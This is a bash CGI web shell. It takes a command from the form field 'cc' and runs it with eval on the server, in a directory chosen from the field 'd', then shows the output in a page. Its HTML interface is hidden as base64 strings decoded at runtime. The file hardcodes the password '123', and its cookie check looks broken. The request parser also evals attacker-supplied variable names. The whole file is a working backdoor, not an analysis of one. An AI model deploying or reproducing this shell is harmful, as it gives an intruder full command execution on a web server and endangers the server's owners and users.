#!/bin/bash -i

#
password="123"


function cgi_get_POST_vars()
{
    # check content type
    [ "${CONTENT_TYPE}" != "application/x-www-form-urlencoded" ] && \
	echo "Warning: you should probably use MIME type "\
	     "application/x-www-form-urlencoded!" 1>&2
    # save POST variables (only first time this is called)
    [ -z "$QUERY_STRING_POST" \
      -a "$REQUEST_METHOD" = "POST" -a ! -z "$CONTENT_LENGTH" ] && \
	read -n $CONTENT_LENGTH QUERY_STRING_POST
    return
}


function cgi_decodevar()
{
    [ $# -ne 1 ] && return
    local v t h
    
    t="${1//+/ }%%"
    while [ ${#t} -gt 0 -a "${t}" != "%" ]; do
	v="${v}${t%%\%*}" 
	t="${t#*%}"       
	
	if [ ${#t} -gt 0 -a "${t}" != "%" ]; then
	    h=${t:0:2} 
	    t="${t:2}" 
	    v="${v}"`echo -e \\\\x${h}` 
	fi
    done
    
    echo "${v}"
    return
}


function cgi_getvars()
{
    [ $# -lt 2 ] && return
    local q p k v s
    # get query
    case $1 in
	GET)
	    [ ! -z "${QUERY_STRING}" ] && q="${QUERY_STRING}&"
	    ;;
	POST)
	    cgi_get_POST_vars
	    [ ! -z "${QUERY_STRING_POST}" ] && q="${QUERY_STRING_POST}&"
	    ;;
	BOTH)
	    [ ! -z "${QUERY_STRING}" ] && q="${QUERY_STRING}&"
	    cgi_get_POST_vars
	    [ ! -z "${QUERY_STRING_POST}" ] && q="${q}${QUERY_STRING_POST}&"
	    ;;
    esac
    shift
    s=" $* "
    # parse the query data
    while [ ! -z "$q" ]; do
	p="${q%%&*}"  # get first part of query string
	k="${p%%=*}"  # get the key (variable name) from it
	v="${p#*=}"   # get the value from it
	q="${q#$p&*}" # strip first part from query string
	# decode and evaluate var if requested
	[ "$1" = "ALL" -o "${s/ $k /}" != "$s" ] && \
	    eval "$k=\"`cgi_decodevar \"$v\"`\""
    done
    return
}

# register all GET and POST variables
cgi_getvars BOTH ALL

pass="SAVEDPWD=$password"
passv=`echo $HTTP_COOKIE | awk '$pass|'  -f0`

if [ $cc2 -eq 4 ] ; then
clear
echo -e "Set-Cookie: SAVEDPWD=;\nContent-type: text/html\n\n"
echo '<meta http-equiv="refresh" content="0;">'
exit
else

if [ -n "$xx"  ] ; then
echo -e "Set-Cookie: SAVEDPWD=$xx;\nContent-type: text/html\n\n"
echo '<meta http-equiv="refresh" content="0;">'
else
echo -e "Content-type: text/html\n\n"
fi

fi
echo 'PGh0bWw+PHRpdGxlPldvcmtpbmc8L3RpdGxlPgo8aGVhZD4KPHN0eWxlPgoKYm9keQp7CgliYWNrZ3JvdW5kOiAjMzMzOwoJY29sb3I6ICNGNUY1RjU7CgoJcGFkZGluZzogMTBweDsKCn0KCgphOmxpbmssIGJvZHlfYWxpbmsKewoJY29sb3I6ICNGRjk5MzM7Cgl0ZXh0LWRlY29yYXRpb246IG5vbmU7Cn0KYTp2aXNpdGVkLCBib2R5X2F2aXNpdGVkCnsKCWNvbG9yOiAjRkY5OTMzOwoJdGV4dC1kZWNvcmF0aW9uOiBub25lOwp9CmE6aG92ZXIsIGE6YWN0aXZlLCBib2R5X2Fob3Zlcgp7Cgljb2xvcjogI0ZGRkZGRjsKCXRleHQtZGVjb3JhdGlvbjogbm9uZTsKfQoKdGV4dGFyZWEKewoJYm9yZGVyOiAxcHggc29saWQ7CgljdXJzb3I6IGRlZmF1bHQ7CgkKCWJhY2tncm91bmQ6ICMwMDA7Cgljb2xvcjogI2ZmZmZmZjsKYm9yZGVyOjFweCBzb2xpZCAjYTFhMWExOwpwYWRkaW5nOjVweCAyMHB4OyAKYm9yZGVyLXJhZGl1czoyNXB4OwotbW96LWJvcmRlci1yYWRpdXM6MjVweDsgLyogRmlyZWZveCAzLjYgYW5kIGVhcmxpZXIgKi8KCn0KCmlucHV0CnsKCWJvcmRlcjogMXB4IHNvbGlkOwoJY3Vyc29yOiBkZWZhdWx0OwoJb3ZlcmZsb3c6IGhpZGRlbjsKCWJhY2tncm91bmQ6ICMwMDA7Cgljb2xvcjogI2ZmZmZmZjsKYm9yZGVyOjFweCBzb2xpZCAjYTFhMWExOwpwYWRkaW5nOjVweCAyMHB4OyAKYm9yZGVyLXJhZGl1czoyNXB4OwotbW96LWJvcmRlci1yYWRpdXM6MjVweDsgLyogRmlyZWZveCAzLjYgYW5kIGVhcmxpZXIgKi8KCn0KaW5wdXQuYnV0dG9uIHsKZm9udC1mYW1pbHk6IENvdXJpZXIgTmV3Owpjb2xvcjogI2ZmZmZmZjsKZm9udC1zaXplOiAxNnB4OwpwYWRkaW5nOiAxMHB4Owp0ZXh0LWRlY29yYXRpb246IG5vbmU7Ci13ZWJraXQtYm9yZGVyLXJhZGl1czogOHB4OwotbW96LWJvcmRlci1yYWRpdXM6IDhweDsKLXdlYmtpdC1ib3gtc2hhZG93OiAwcHggMXB4IDNweCAjYWJhYmFiOwotbW96LWJveC1zaGFkb3c6IDBweCAxcHggM3B4ICNhYmFiYWI7CnRleHQtc2hhZG93OiAxcHggMXB4IDNweCAjNjY2NjY2Owpib3JkZXI6IHNvbGlkICNkZWRiZGUgMXB4OwpiYWNrZ3JvdW5kOiAjOTA5MDkwIDsKfQouYnV0dG9uOmhvdmVyIHsKYmFja2dyb3VuZDogI0IwQjBCMDsKfQoKIGRpdi5ib3gKewpjb2xvcjogIzMzMzsKYm9yZGVyOjNweCBzb2xpZCAjYTFhMWExOwpwYWRkaW5nOjEwcHggNDBweDsgCmJhY2tncm91bmQ6I2U4ZThlODsKd2lkdGg6OTQlOwpib3JkZXItcmFkaXVzOjI1cHg7Ci1tb3otYm9yZGVyLXJhZGl1czoyNXB4OyAvKiBGaXJlZm94IDMuNiBhbmQgZWFybGllciAqLwp9Cjwvc3R5bGU+CjwvaGVhZD4KPGJvZHk+CjxjZW50ZXI+CjxwcmU+CjxjZW50ZXI+PGltZyBzcmM9Imh0dHA6Ly9kLnRvcDR0b3AubmV0L3BfMjQ5YTRpajEucG5nIj48L2NlbnRlcj4KPC9wcmU+Cgo8ZGl2IGFsaWduPSJjZW50ZXIiPg==' | base64 -d

if [ -n "$cc"  ] ; then
echo "<table border='0' width='100%'><tr><td align='center'><div class='box' align='left'><xmp>"
cd $d 
eval $cc
echo "<cmd>$?<cmd>"
echo '</xmp></div></pre></td></tr></table><br><br>'
fi
echo 'PGJyPjxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIiPg0KCQ0KCTxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIiPg0KCTxkaXYgYWxpZ249ImNlbnRlciI+PHRhYmxlIGJvcmRlcj0iMCIgd2lkdGg9IjEyMCIgaWQ9InRhYmxlMSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIwIj48dHI+PHRkIHdpZHRoPSI3MTIiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjYyIgc2l6ZT0iMTAwIiAgLz48L3RkPjx0ZD48L3RkPjwvdHI+PHRyPjx0ZCB3aWR0aD0iNzEyIj4NCjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJkIiBzaXplPSIxMDAiIHZhbHVlPSI=' | base64 -d
pwd  
echo 'Ii8+CjwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9ImJ1dHRvbjEiIHZhbHVlPSJT
ZW5kIiAvPjwvdGQ+PC90cj48L3RhYmxlPjwvZGl2PjwvZm9ybT48YnI+PGJyPgo8YnI+PGJyPjxo
cj48Y2VudGVyPgo8Zm9ybSBtZXRob2Q9InBvc3QiIGFjdGlvbj0iIj4KCQoJPGZvcm0gbWV0aG9k
PSJwb3N0IiBhY3Rpb249IiI+Cgk8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJjYzIiIHZhbHVl
PSI0IiAgLz4KCQoJPGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ1dHRvbiIgbmFtZT0iYnV0
dG9uIiB2YWx1ZT0iTG9nb3V0IiAvPgoJPC9mb3JtPg==' | base64 -d
